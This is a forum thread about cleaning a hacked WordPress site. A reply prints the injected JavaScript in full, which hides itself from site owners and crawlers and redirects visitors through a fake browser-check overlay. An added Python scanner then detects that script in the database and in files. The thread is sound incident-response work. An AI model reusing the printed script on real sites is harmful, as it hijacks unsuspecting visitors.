romeiovasu
asked on
php website

I have a website, www.saberpoint.com. Suddenly something happened to the WordPress website and the menu started showing at the top. We came to know our site got compromised, and we are trying to fix this. Can someone help me out to see what is wrong in the page?
Jim Horn
Curiosity overwhelms me ... Are you asking experts here to navigate to a site that is 'compromised', and if so, define 'compromised' for us.
romeiovasu
ASKER
No, the compromised one has been fixed. Now we are asking whether there is anything we can fix in the CSS sheet.
ASKER CERTIFIED SOLUTION
Rob
"No, the compromised one has been fixed"
Not http://www.saberpoint.com/. That IS still compromised.

Hi Rob,

I didn't understand what you are saying. If you don't mind, can you explain it to me in more detail please?
The problem here is that you won't know which files have been compromised, or which port was exploited or which vulnerability. As far as I can see you have malware running on it right now which was injected via JavaScript vulnerabilities, and it might be best to take it offline to minimize loss of data if they are harvesting information using the vulnerability.

Personally I would be tempted to build a clean new server and make sure it is patched and secured.
You could try running a rootkit scanner on it or a malware sweep. ClamAV is often used to locate malware on Linux.

Unfortunately my expertise does not go much beyond this, and it would be best to get a professional opinion added to resolve your issue in full.

I found some info running a free scan for vulnerabilities here:

Result =
Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JS:GEN2?web.js.script-injection.003
Sorry, just remembered you mentioned it's a WordPress site. Are you on the latest version of WordPress? Are all your plugins and themes up to date? Any one of these elements could have a vulnerability that exposed your site.
I agree with Maclean: you need a professional to sift through this, or start from scratch on another server. If you've got a lot of content then starting from scratch is going to be a pain.

The "malware" will most likely be in your database and injected by a malicious user so scanning your server will most likely turn up nothing.

Please refer to section 5 of my article below that has some information relating to cross site scripting and SQL/JS injection:
https://www.experts-exchange.com/articles/12871/Avoiding-mailto-and-how-to-capture-a-web-enquiry.html

I found that js script by looking at the source code of the page.
According to redbot you are using the PHP/5.4.45 engine.
This one has various vulnerabilities, as it is behind in patch levels by about 2-3 months.

https://msisac.cisecurity.org/advisories/2015/2015-105.cfm
https://www.exploit-db.com/exploits/38123/

So I would say that the likely cause was not having patched the web server frequently.

I will leave things with Rob and others, however; he seems to have good knowledge of these problems.
Once a WordPress site has been compromised, you have to take a LOT of steps to make sure it is clean again. Maclean posted the link to Sucuri, which will scan the front-facing site for obvious vulnerabilities but there may be other, non-obvious backdoors now in your installation.  This article:

https://www.experts-exchange.com/articles/10806/Detecting-Recovering-From-and-Preventing-WordPress-Site-Hacks.html

talks about steps you can take to attempt to recover but if you are not familiar with WordPress hacks and overall security issues, pay Sucuri to clean you up.
Not fixed yet. See line 451 (when you view the source).

The code is on one line, but here I have expanded it (comments added to show what each part does).
function start() {
    // t(e): read the cookie named e from document.cookie, or null if it is not set
    function t(e) {
        var t = document.cookie,
            n = t.indexOf(" " + e + "=");
        n == -1 && (n = t.indexOf(e + "="));
        if (n == -1) t = null;
        else {
            n = t.indexOf("=", n) + 1;
            var r = t.indexOf(";", n);
            r == -1 && (r = t.length), t = unescape(t.substring(n, r))
        }
        return t
    }

    // n(e, t, n): set cookie e=t, expiring n days from now
    function n(e, t, n) {
        var r = new Date;
        r.setDate(r.getDate() + n);
        var i = escape(t) + (n == null ? "" : "; expires=" + r.toUTCString());
        document.cookie = e + "=" + i
    }

    // r(): true if the visitor looks like a logged-in WordPress user (the site owner
    // or admin) or has already been marked with referrerRedirectCookie;
    // those visitors never see the overlay, which is why the owner did not notice it
    function r() {
        return document.cookie ? document.cookie.indexOf("wordpress_logged") !== -1 || document.cookie.indexOf("wp-settings") !== -1 || document.cookie.indexOf("referrerRedirectCookie") !== -1 || document.cookie.indexOf("wordpress_test") !== -1 ? (console.log("true"), !0) : (console.log("false2"), !1) : (console.log("false1"), !1)
    }
    // Only unmarked, non-logged-in visitors are targeted. The marker cookie lasts 730 days so
    // each victim is hit once, and search-engine crawlers (google/bot/crawl in the user agent)
    // are skipped so the injection is harder to spot from outside
    if (!r()) {
        n("referrerRedirectCookie", "do not redirect", 730);
        var e = navigator.userAgent;
        if (!e || e.length == 0) return;
        e = e.toLowerCase(), e.indexOf("google") == -1 && e.indexOf("bot") == -1 && e.indexOf("crawl") == -1 && hideWebSite()
    }
}

// Full-page white overlay that mimics a "Checking your browser" interstitial;
// clicking anywhere on it sends the visitor to w_location
function createPopup() {
    var e = document.createElement("div");
    e.style.position = "absolute", e.style.width = "100%", e.style.height = "100%", e.style.left = 0, e.style.top = 0, e.style.backgroundColor = "white", e.style.zIndex = 99999, document.body.appendChild(e), e.onclick = function() {
        window.location = w_location
    };
    var t = document.createElement("p");
    return t.innerText = "Checking your browser before accessing " + window.location.host + "...", t.style.textAlign = "center", t.style.fontSize = "x-large", t.style.position = "relative", t.textContent = t.innerText, e.appendChild(t), e
}

// "Continue" button placed on the overlay; it also sends the visitor to w_location
function createButton() {
    var e = document.createElement("div");
    return e.style.position = "absolute", e.style.top = "20%", e.style.left = "10%", e.style.right = "10%", e.style.width = "80%", e.style.border = "1px solid black", e.style.textAlign = "center", e.style.verticalAlign = "middle", e.style.margin = "0, auto", e.style.cursor = "pointer", e.style.fontSize = "xx-large", e.style.borderRadius = "5px", e.onclick = function() {
        window.location = w_location
    }, e.onmouseover = function() {
        e.style.border = "1px solid red", e.style.color = "red"
    }, e.onmouseout = function() {
        e.style.border = "1px solid black", e.style.color = "black"
    }, e.innerText = "Continue", e.textContent = e.innerText, e
}
// The redirect target, the overlay builder, and a 10 ms poller that runs start()
// as soon as the document has loaded
var w_location = "http://default72.com",
    hideWebSite = function() {
        var e = createPopup(),
            t = createButton();
        e.appendChild(t)
    },
    readyStateCheckInterval = setInterval(function() {
        if (document.readyState === "complete" || document.readyState == "interactive") clearInterval(readyStateCheckInterval), start()
    }, 10);

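Rob's two points, that the injection usually lives in the database rather than in files, and that the script above cloaks itself from logged-in users and crawlers, suggest a concrete hunt. The following is an added example written for this thread, not code from the page, from the posters, or from WordPress. It takes the tell-tale strings from the decoded script (the logged-in cookie gate, the referrerRedirectCookie marker, the crawler user-agent filter, the "Checking your browser" overlay text and the off-site redirect) and searches for the combination in page source, in wp_posts and wp_options, and in theme/plugin files. The table layouts, sample rows and the minified snippet are constructed here; default72.com is the redirect host seen in the decoded script.

```python
"""Hunt for the cloaking redirect script in page source, in the WordPress
database and on disk. Added example for this thread (not the page's own
code); table layouts and sample rows are constructed."""
import os
import re
import sqlite3

# Tell-tale strings taken from the decoded script. Each is weak on its own
# (themes do read WordPress cookies); the combination of a logged-in gate,
# a crawler filter, an overlay and an off-site redirect is the cloaking pattern.
INDICATORS = {
    "cookie_gate": re.compile(r"wordpress_logged|wp-settings|wordpress_test"),
    "marker_cookie": re.compile(r"referrerRedirectCookie"),
    "bot_filter": re.compile(r'indexOf\("(?:google|bot|crawl)"\)'),
    "overlay": re.compile(r"Checking your browser before accessing"),
    "offsite_redirect": re.compile(r"window\.location\s*=\s*w_location"),
}
REDIRECT_TARGET = re.compile(r'w_location\s*=\s*"(https?://[^"]+)"')


def scan_text(text):
    """Names of the indicators present in a blob of HTML/JS, sorted."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def is_cloaking_redirect(text):
    """Flag only when the logged-in gate and the off-site redirect are both
    present plus at least one more tell, so a theme's own cookie helper stays quiet."""
    hits = scan_text(text)
    return "cookie_gate" in hits and "offsite_redirect" in hits and len(hits) >= 3


def redirect_targets(text):
    """URLs the script sends victims to (what to block and report)."""
    return REDIRECT_TARGET.findall(text)


def scan_wp_db(conn):
    """Search wp_posts and wp_options for the script. Returns (table, key,
    indicators) per hit. Text widgets are PHP-serialized inside option_value,
    so a plain LIKE on '<script' still reaches them."""
    findings = []
    for post_id, body in conn.execute(
            "SELECT ID, post_content FROM wp_posts WHERE post_content LIKE '%<script%'"):
        if is_cloaking_redirect(body):
            findings.append(("wp_posts", post_id, scan_text(body)))
    for name, value in conn.execute(
            "SELECT option_name, option_value FROM wp_options WHERE option_value LIKE '%<script%'"):
        if is_cloaking_redirect(value):
            findings.append(("wp_options", name, scan_text(value)))
    return findings


def scan_files(root, suffixes=(".php", ".js", ".html")):
    """Same check over theme/plugin files on disk (footer.php, header.php and
    minified JS are the usual spots). Returns (path, indicators) per hit."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.endswith(suffixes):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
                if is_cloaking_redirect(text):
                    findings.append((path, scan_text(text)))
    return findings


# Constructed sample: a minified cut of the decoded script, the way it sits
# on one line of the page source or inside a post body / text widget.
INJECTED = (
    '<script>function r(){return document.cookie.indexOf("wordpress_logged")!==-1}'
    'var w_location="http://default72.com";e.onclick=function(){window.location=w_location};'
    'e=e.toLowerCase(),e.indexOf("google")==-1&&e.indexOf("bot")==-1&&hideWebSite();'
    't.innerText="Checking your browser before accessing "+window.location.host+"...";'
    'n("referrerRedirectCookie","do not redirect",730)</script>'
)
# A benign script that touches a WordPress cookie, to show it is not flagged.
BENIGN = '<script>if(document.cookie.indexOf("wp-settings")!==-1){showAdminBar()}</script>'


def build_sample_db():
    """In-memory stand-in for the two WordPress tables: one clean post, one
    benign script, one injected post and one injected text widget (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE wp_posts(ID INTEGER PRIMARY KEY, post_title TEXT, post_content TEXT);"
        "CREATE TABLE wp_options(option_name TEXT, option_value TEXT);"
    )
    conn.executemany("INSERT INTO wp_posts VALUES (?,?,?)", [
        (1, "Home", "<p>Welcome</p>"),
        (2, "About", "<p>About us</p>" + INJECTED),
        (3, "Contact", BENIGN),
    ])
    conn.executemany("INSERT INTO wp_options VALUES (?,?)", [
        ("siteurl", "http://www.example.com"),
        # serialized-widget shape only; the length prefix is not accurate here
        ("widget_text", 'a:1:{i:2;a:1:{s:4:"text";s:0:"' + INJECTED + '";}}'),
    ])
    return conn


if __name__ == "__main__":
    for hit in scan_wp_db(build_sample_db()):
        print(hit)
    print("redirects to:", redirect_targets(INJECTED))
```

Against a real site, point scan_wp_db at a connection to the live MySQL database (the same two queries work there) and scan_files at wp-content, and treat a hit as a pointer to the foothold, not the whole clean-up: removing the rows or lines stops the redirect but does not tell you how the attacker wrote them, which is the point Rob and Maclean make about rebuilding or bringing in a professional.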